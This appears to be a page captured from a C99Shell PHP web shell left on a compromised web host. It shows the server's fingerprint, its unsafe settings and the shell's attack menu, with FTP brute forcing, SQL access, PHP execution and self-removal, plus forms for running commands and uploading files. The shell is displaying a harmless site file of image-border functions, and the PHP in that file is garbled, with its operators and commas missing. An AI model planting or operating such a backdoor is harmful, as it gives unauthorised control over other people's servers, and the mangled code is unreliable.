!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/include/   drwxr-xr-x
Free 318.37 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     functions.php (4.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?

//functions


/**********************************************************

BORDER AROUND PICTURES

***********************************************************/


function border($imagepath$levelsToCommonDirectory 1){

$rootDir "";
for (
$i 0$i $levelsToCommonDirectory$i++){

    
$rootDir .= "../";

}

$rootDir .= "common/images";


print(
"<table align=\"left\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td width=\"3\" height=\"1\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"3\" height=\"1\"></td>\n");
        print(
"\t\t<td height=\"1\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" height=\"1\"></td>\n");
        print(
"\t\t<td width=\"3\" height=\"1\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"3\" height=\"1\"></td>\n");
        print(
"\t\t<td width=\"6\" height=\"1\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"6\" height=\"1\"></td>\n");
        print(
"\t\t<td width=\"1\" height=\"1\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td bgcolor=\"#4D8B59\" height=\"3\" colspan=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" height=\"3\"></td>\n");
        print(
"\t\t<td width=\"6\" height=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/pic_border-02.gif\" width=\"6\" height=\"3\"></td>\n");
        print(
"\t\t<td width=\"1\" height=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"1\" height=\"3\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td bgcolor=\"#4D8B59\" width=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"3\"></td>\n");



print(
"<!--picture here-->\n");
        print(
"\t\t<td width=\"63\" height=\"62\">\n");
            print(
"\t\t\t<img src=\"$imagepath\"></td>\n");



        print(
"\t\t<td bgcolor=\"#4D8B59\" width=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"3\"></td>\n");
        print(
"\t\t<td width=\"6\" rowspan=\"2\" background=\"$rootDir/pic_border-06.gif\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"6\"></td>\n");
        print(
"\t\t<td width=\"1\" height=\"62\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"1\" height=\"12\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td bgcolor=\"#4D8B59\" height=\"3\" colspan=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" height=\"3\"></td>\n");
        print(
"\t\t<td width=\"1\" height=\"3\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"1\" height=\"3\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td width=\"3\" height=\"6\">\n");
            print(
"\t\t\t<img src=\"$rootDir/pic_border-08.gif\" width=\"3\" height=\"6\"></td>\n");
        print(
"\t\t<td height=\"6\" colspan=\"2\" background=\"$rootDir/pic_border-09.gif\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" height=\"6\"></td>\n");
        print(
"\t\t<td width=\"6\" height=\"6\">\n");
            print(
"\t\t\t<img src=\"$rootDir/pic_border-10.gif\" width=\"6\" height=\"6\"></td>\n");
        print(
"\t\t<td width=\"1\" height=\"6\">\n");
            print(
"\t\t\t<img src=\"$rootDir/spacer.gif\" width=\"1\" height=\"6\"></td>\n");
    print(
"\t</tr>\n");
print(
"</table>\n");


}



function 
listingBorder ($imagepath$URL$color "#bd9d27"){


print(
"<table cellpadding=\"0\" cellspacing=\"0\" border=\"0\">\n");

    print(
"\t<tr>\n");
        print(
"\t\t<td colspan=\"3\" bgcolor=\"$color\" height=\"2\"><img src=\"../common/images/spacer.gif\" width=\"1\" height=\"2\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td bgcolor=\"$color\"><img src=\"../common/images/spacer.gif\" width=\"2\" height=\"2\"></td>\n");
        print(
"\t\t<td>\n");
            print(
"\t\t\t<a href=\"$URL\"><img src=\"$imagepath\" width=\"100\" border=\"0\" hspace=\"3\" vspace=\"3\"></a></td>\n");
        
        print(
"\t\t<td bgcolor=\"$color\"><img src=\"../common/images/spacer.gif\" width=\"2\" height=\"2\"></td>\n");
    print(
"\t</tr>\n");
    print(
"\t<tr>\n");
        print(
"\t\t<td colspan=\"3\" bgcolor=\"$color\" height=\"2\"><img src=\"../common/images/spacer.gif\" width=\"1\" height=\"2\"></td>\n");
    print(
"\t</tr>\n");

print(
"</table>\n");










}



?>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0319 ]--